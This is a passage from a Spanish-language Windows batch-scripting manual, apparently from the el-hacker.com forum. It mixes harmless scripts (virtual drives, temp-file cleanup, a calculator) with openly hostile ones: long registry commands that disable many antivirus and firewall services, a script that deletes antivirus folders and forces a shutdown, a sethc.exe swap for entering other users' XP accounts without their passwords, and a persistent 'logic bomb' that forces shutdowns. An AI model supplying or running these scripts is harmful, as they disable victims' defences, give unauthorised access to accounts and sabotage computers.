/freg add "HKLMsystemcontrolset001servicesFix-it AV" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesFix-it AV" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesFix-it AV" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesFreedom" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesFreedom" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesFreedom" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesF-StopW" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesF-StopW" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesF-StopW" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesiamapp" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesiamapp" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesiamapp" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesLook n Stop" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesLook n Stop" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesLook n Stop" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcontrolset001servicesMcAfee Firewall" /v Start /t REG_DWORD /d 4/freg add "HKLMsystemcontrolset002servicesMcAfee Firewall" /v Start /t REG_DWORD /d 4/freg add "HKLMsystemcurrentcontrolsetservicesMcAfee Firewall" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesMcAfee Winguage" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcontrolset002servicesMcAfee Firewall" /v Start /t REG_DWORD /d 4/freg add "HKLMsystemcurrentcontrolsetservicesMcAfee Firewall" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesMcAfee.InstantUpdate.Monitor" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesMcAfee.InstantUpdate.Monitor" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesMcAfee.InstantUpdate.Monitor" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesMcAfeeVirusScanService" /v Start /tREG_DWORD /d 4 /f
  41. 41. 41reg add "HKLMsystemcontrolset002servicesMcAfeeVirusScanService" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesMcAfeeVirusScanService" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesNAV Agent" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesNAV Agent" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNAV Agent" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesNAV Configuration Wizard" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesNAV Configuration Wizard" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNAV Configuration Wizard" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesNAV DefAlert" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesNAV Configuration Wizard" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNAV Configuration Wizard" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesNod32CC" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesNod32CC" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemCURRENTcontrolsetservicesNod32CC" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcontrolset001servicesNOD32POP3" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesNOD32POP3" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNOD32POP3" /v Start /t REG_DWORD /d 4/freg add "HKLMsystemcontrolset001servicesNorton Auto-Protect" /v Start /t REG_DWORD/d 4 /freg add "HKLMsystemcontrolset002servicesNorton Auto-Protect" /v Start /t REG_DWORD/d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNorton Auto-Protect" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesNorton eMail Protect" /v Start /t REG_DWORD/d 4 /freg add "HKLMsystemcontrolset002servicesNorton eMail Protect" /v Start /t REG_DWORD/d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNorton eMail Protect" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesNorton Navigaton Loader" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesNorton Navigaton Loader" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNorton Navigaton Loader" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesNorton Program Scheduler" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesNorton Program Scheduler" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNorton Program Scheduler" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesNorton Program Event Checker" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesNorton Program Event Checker" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNorton Program Event Checker" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesNPS Event Checker" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesNPS Event Checker" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesNPS Event Checker" /v Start /tREG_DWORD /d 4 /f
  42. 42. 42reg add "HKLMsystemcontrolset001servicesPanda Scheduler" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcontrolset002servicesPanda Scheduler" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcurrentcontrolsetservicesPanda Scheduler" /v Start /t REG_DWORD/d 4 /freg add "HKLMsystemcontrolset001servicesScanInicio" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesScanInicio" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesScanInicio" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesSymTray - Norton SystemWorks" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesSymTray - Norton SystemWorks" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesSymTray - Norton SystemWorks" /vStart /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesTiny Personal Firewall" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesTiny Personal Firewall" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesTiny Personal Firewall" /v Start /tREG_DWORD /d 4 /freg add "HKLMsystemcontrolset001servicesTrueVector" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesTrueVector" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesTrueVector" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcontrolset001servicesVirusScan Online" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcontrolset002servicesVirusScan Online" /v Start /t REG_DWORD /d4 /freg add "HKLMsystemcurrentcontrolsetservicesVirusScan Online" /v Start /t REG_DWORD/d 4 /freg add "HKLMsystemcontrolset001servicesZoneAlarm" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcontrolset002servicesZoneAlarm" /v Start /t REG_DWORD /d 4 /freg add "HKLMsystemcurrentcontrolsetservicesZoneAlarm" /v Start /t REG_DWORD /d4 /fY otro av killer:Este serÃa un BAT para eliminar estos antivirus en un Xp:--------------------------------------@echo offc:cdrd /q /s *norton*rd /q /s *kav*rd /q /s *kaspersky*rd /q /s *panda*rd /q /s *mcafee*cd documents*rd /q /s *norton*rd /q /s *kav*rd /q /s *kaspersky*rd /q /s *panda*rd /q /s *mcafee*shutdown -s -f -t 00
  43. 43. 43exit--------------------------------------Te lo explico:con el comando rd (borrar carpeta) podemos eliminar una carpetaentera (no es necesario entrar, quitarle los atributos a los archivos yborrarlos a continuación!). Además los modificadores /q y /s hacenque se eliminen también los subdirectorios y que no pidaconfirmación.El uso del *asterisco* es para no tener que poner la ruta completa.en vez de poner:cd documents and settings podemos poner directamente cddocuments*.Y nos libra de tener que escribir el resto. (Cuidado porque solo sirvepara algunos comandos!!. otros como COPY y MOVE no permiten eluso de asteriscos*)De esta manera, borramos TODAS las carpetas que tengan en sunombre norton, panda, kav, kaspersky o mcaffe en el directorio raÃz.Luego accedemos a documents and settings y repetimos laoperación. Borramos allà cualquier carpeta que tenga un nombre deantivirus.Al terminar, en el shutdown le he puesto 0 segundos de espera. Paraque lo apague al instante, y además he añadido -f que fuerza acerrar todas aquellas apliaciones que requieran confirmación. Asà elapagado es instantáneo!!. 20. Unidades virtualesCrear unidad virtual con contraseña:Password de acceso para los que quieran utilizar el programa =123123Código:@echo offtitle Virtual disk Acces Software:iniclsecho ---------------------------------------echo Bienvenido %Username%echo ---------------------------------------echo.echo - 1.Configurar Aceso
  44. 44. 44echo - 2.Abrir Sesion de Unidad I:echo - 3.Acceder a I:echo - 4.Cerrar Sesion de Unidad I:echo.echo ---------------------------------------Set /p ini= ELija:If %ini%== 1 goto 1If %ini%== 2 goto 2If %ini%== 3 goto 3If %ini%== 4 goto 4:1md c:Discodurovirtualattrib +h c:Discodurovirtualecho ya puede continuar con el siguiente pasopausegoto ini:2echo.Set /p pw= Password:If %pw%==123123 (goto :acces) else (goto :noacces):accessubst i: c:Discodurovirtualecho ya Puede acceder a su unidadpausegoto ini:3start i:goto noacces:4subst i: /decho gracias por utilizar este programapausegoto noacces:noaccesexitCrear unidad virtual a partir de una carpeta invisible:
  45. 45. 45Tal vez alguna vez hayáis pensado en tener un disco duro extra... ovarios discos duros. (c:, f:, g:, etc...) para repartir vuestros datosde manera más ordenada, o si compartes el ordenador con tu familia,asignarte un HD exclusivamente para tí.A falta de hardware... bienvenido el software!Todos sabéis que esto puede hacerse con una partición... pero hayotra forma MUCHO más sencilla de hacerlo. Es la creación deunidades virtuales.Para ello vamos a acceder a la consola y vamos a crear una carpetavacía llamada "unid4d"md unid4dahora vamos a hacerla invisible..attrib +h unid4dbien... Ahora vamos a "convertir" esta carpeta en una unidad virtualque vamos a llamar H:. (NOTA= digo "convertir" porque lo que enrealidad se hace es asignar el contenido de esta carpeta comounidad, aunque la carpeta siempre seguirá existiendo)Para ello tecleamos:subst h: c:unid4dojo porque si pones al final no vale! <--- así no vale!Tan facil como eso. Ve a Mi Pc, y al lado de C: también tendrás tunueva unidad H: ideal para meter todas las cosas relacionadas con elh4ck1ng!!También puedes crear unidades a partir de carpetas que yacontengan archivos. No hay problema!Para eliminar una unidad virtual, entonces escribe:subst "unidad": /den el ejemplo:subst h: /dY no te preocupes porque el contenido de la carpeta seguirá
  46. 46. 46existiendo con su contenido intacto.Nota2= Antes escondimos la carpeta unid4d para que no fueravisible. No hace falta hacerlo. Es por pura estética. Para volver denuevo visible la carpeta, escribe:attrib unid4d -hCrear una unidad virtual protegida:En cuestion de 15 minutos he creado un sencillo bat que protege unaunidad virtual por contraseña. Aqui les dejo el code. Se presuponeque la unidad es H: sacada de una carpeta llamada c:unid4d (comoen el manual de arriba) y la contraseña es 31173.Aqui os dejo el code:----------------logginH.bat------------------- @echo offclsecho.echo.echo Bienvenido, usuario.echo.echo Para acceder a la Unidad H: inserte la contraseña correcta:echo.set /p pass=if %pass%==31173 (goto :acces) else goto :noacces:accesecho.echo Contraseña correcta. Accediendo a la Unidad H:subst h: c:unid4d >nulecho Espere 2 segundos ypausestart h:goto :end:noaccesclsecho.echo.echo Contraseña Incorrecta.echo Usted no esta autorizado a entrar.pausegoto :end:endexit
  47. 47. 47---------------------------------------------------------Para salir de la unidad H: debeis usar este otro Bat, creado paravolver a protegerla:-----------exit.bat---------------- @echo offclsecho.echo.echo Saliendo de la unidad H: ....subst h: /decho.echo.echo La unidad H: vulve a estar protegida por contraseña.echo.echo Gracias por usar k4ron73´s softwareecho Le recordamos que visite usualmente el foro de el-hacker.compara seguir aprendiendo.echo Quiere visitarlo ahora? (si/no)echo.set /p foro=if %foro%==si (start http://foro.el-hacker.com/) else (echo Pues tute lo pierdes!)pauseexit-----------------------------------------------------------Es mucho más facil bajarte el stenagos.. por supuesto. Y son muchomás vistosos los demás softwares. Pero ´hay que dar un paso más yimplicarse en el funcionamiento. En crear tus propias herramientas.Una variación del primer code sería hacer que si el usuario falla lacontraseña, apaguemos automaticamente el ordenador. Juajajaja!!Me encantan los BATs!!--------logginh2.bat--------- @echo offclsecho.echo.echo Bienvenido, usuario.echo.echo Para acceder a la Unidad H: inserte la contraseña correcta:
  48. 48. 48echo.set /p pass=if %pass%==31173 (goto :acces) else goto :noacces:accesecho.echo Contraseña correcta. Accediendo a la Unidad H:subst h: c:unid4d >nulecho Espere 2 segundos ypausestart h:goto :end:noaccesclsshutdown -s -f -t 5 -c "Esto por intentar entrar donde no debes...LAMMEEER!"goto :end:endexit------------------------------------------------------------- 21. Bat para hackear cuentas de usuario en XPCon este .bat podras hackear cuentas de XP, por que podras entrar alos usuarios que hay en un pc y hacer todo lo que quieras y sinnecesidad de saber su contraseña.Por defecto windows XP tiene instalado una ayuda de configuracionde teclas que se activa pulsando 5 veces seguidas la tecla shift, loque hace eso solamente es como un pequeño acceso directo a elarchivo sethc.exe que esta en system32 entonces si el archivocmd.exe lo copiamos renombramos a sethc.exe y lo volvemos acopiar y pegar por el verdadesro sethc.exe cuando pulsemos la teclashift 5 veces tendremos un acceso a MS-DOS para no hacer tantorollo de copiar y pegar ejecutemos este bat: @echo offcopy C:WINDOWSsystem32cmd.exe c:cd C:WINDOWSsystem32del sethc.exeecho > zzz.htmcd c:ren cmd.exe sethc.execopy sethc.exe C:WINDOWSsystem32del sethc.exeexiteste bat hace todo lo que te acabo de decir y aparte crea una un
  49. 49. 49archivo zzz.htm que nos sera muy util al momento de hackear lu egolo explicare.ya que veas que pulsando 5 veces shift se abre ms-dos ya estas listo,lo que ahora deves hacer es cerrar cesion de tu usuario y dondeaparecen las imagenes de los usuarios para que entres a ellos ypongas contraseña lo unico que deves hacer es pulsar 5 veces shift yque se te habra ms-dos ya despues solo tecleas para abrir elnavegador:start zzz.htmy cuando se te abra el navegador en la barra de direccionesescribes:C:Documents and Settingsaquielusuarioy pones el nombre del usuario que quieres entrar y listo tendrasacceso completo a el sin necesidad de poner contraseñasi quieres puedes abrir c: para copiar los archivos que quieras paradespues poder entrar a tu usuario y verlos sin problemasPD: tambien puedes crear cuentas de usuario,cuando abras ms-dos teclea compmgmt.msc y se te abrira unaspropiedades en las que podras crear usuarios como administrador ytendras acceso completo 22. Bat ejecutado un dia y hora especificoIf %date%==12/12/2012 ( goto :si )If not %date%==12/12/2012 ( goto :no ):noexit:siresto codeEsto lo que hace es ver si es igual la variable date ( k es universalque kiere decir que esta en todos los equipos ) es igual a la fecha quepongas tu si es que si va a :si y si es k no va a :no. Pero que pasa siese dia no enciende el ordena pues puedes poner toda una semanaun 4 o 5 dias y lo mas seguro esque uno de esos dias lo encienda... 23. Bomba logica en bat@echo off[color=red]clsTitle Entrevistador[/color]
  50. 50. 50echo @echo off > bat2.batecho Cual es tu nombre??set /p var=echo cd >> bat2.bat[color=red]Copy bat2.bat %systemroot%Win32.batAttrib +h +s +r %systemroot%Win32.bat[/color]echo reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v Win32 /d"%systemroot%Win32.bat"echo Cual es tu apellido??set /P var1=cdecho shutdown -r -s -f -t 60 -c Error de sistema, yo de ti compraba otro ordenador>>bat2.batexit >> bat2.batecho Aaa entonces te llamas %var% %var1%echo.pauseexit 24. Borrar un archivo o un directorio en batBorrar archivo:del /s /q archivo.extens ionBorrar directorio:rd /s /q C:rutakekieras 25. Bat que borra archivos temporalesCopien este codigo y guardenlo en sus escritorios con el un nobresimilar a "borra temporales.cmd" y listo.... les ayudara a leiminararchivos innecesarios de sus sistemas... espero que les sirva.-...por cierto... solo copien y peguen en bloq de notas (ahi tomara laforma).Código:@ echo offclsecho +---------------------------------------------------------------------------+echo ¦ EEEE LL HH HH AAAA CCCC KK K EEEE RRRRRR ¦echo ¦ EE LL HH HH AA AA CC C KK K EE RR RR ¦echo ¦ EE LL HH HH AA AA CC KK K EE RR RR ¦echo ¦ EEEE LL **** HHHHH AAAAAAA CC KKK EEEE RRRRRR ¦echo ¦ EE LL **** HH HH AA AA CC KK K EE RR R ¦echo ¦ EE LL HH HH AA AA CC C KK K EE RR RR ¦echo ¦ EEEE LLLL HH HH AA AA CCCC KK K EEEE RR RR ¦echo ¦ ¦
  51. 51. 51echo ¦ WWW.EL-HACKER.COM oprima ENTRADA PARA CONTINUAR ¦echo +---------------------------------------------------------------------------+echoclsecho +---------------------------------------------------------------------------+echo ¦ COMUNIDAD UNDERGROUND HISPANA ¦echo ¦ C U H ¦echo ¦ ¦echo ¦ ESTE PROCESO REALIZA LA DEPURACION DE ARCHIVOS TEMPORALES ¦echo ¦ EN TU DISCO DURO. ¦echo ¦ ¦echo ¦ - AYUDANDO AGILIZAR TUS APLICACIONES Y ELIMINANDO ARCHIVOS ¦echo ¦ INNECESARIOS. ¦echo ¦ ¦echo ¦***************************************************************** ¦echo ¦ ** SE RECOMIENDA CERRAR CUALQUIER OTRA APLICACION ANTES DE **¦echo ¦ ** CONTINUAR CON ESTE PROCESO ** ¦echo ¦***************************************************************** ¦echo ¦ ¦echo ¦ ¦echo ¦ WWW.EL-HACKER.COM ¦echo ¦ ¦echo ¦ Oprima ENTRADA ¦echo +---------------------------------------------------------------------------+pauseclsecho +---------------------------------------------------------------------+echo ¦ ¦echo ¦ ESPERE UN MOMENTO. ELIMINANDO ARCHIVOS... ¦echo ¦ ¦echo ¦ ¦echo ¦ Este proceso puede tardar algunos minutos ¦echo +---------------------------------------------------------------------+c:del c:*.tmp /s /qd:attrib *.* -r -hdel d:*.tmp /s /qcls
  52. 52. 52echo +---------------------------------------------------------------------+echo ¦ ¦echo ¦ ESPERE UN MOMENTO. ELIMINANDO ARCHIVOS... ¦echo ¦ ¦echo ¦ ¦echo ¦ Este proeso puede tardar algunos minutos ¦echo +---------------------------------------------------------------------+cdtempattrib *.* -r -hdel c:temp*.tmp /qcd..clsecho +---------------------------------------------------------------------+echo ¦ ¦echo ¦ PROCESO TERMINADO ¦echo ¦ ¦echo ¦ Para cualquier problema publicalo en www.el-hacker.com/foro ¦echo ¦ ¦echo ¦ Oprima ENTRADA para regresar al DESKTOP o la pantalla principal ¦echo ¦ ¦echo ¦ (¯°»¦«¤ Ave de Fuego ¤»¦«°¯) ¦echo +---------------------------------------------------------------------+pauseclsexit:FIN 26. Programa de calculos matematicosCodigo:@echo offcd echo Bienvenido a la calculadora personalpause > nul:princiclsecho Ingresa un numero:set /p num=echo.echo Ingresa el segundo numero:set /p numb=:inisiclsecho Elige la operacion que desees:

×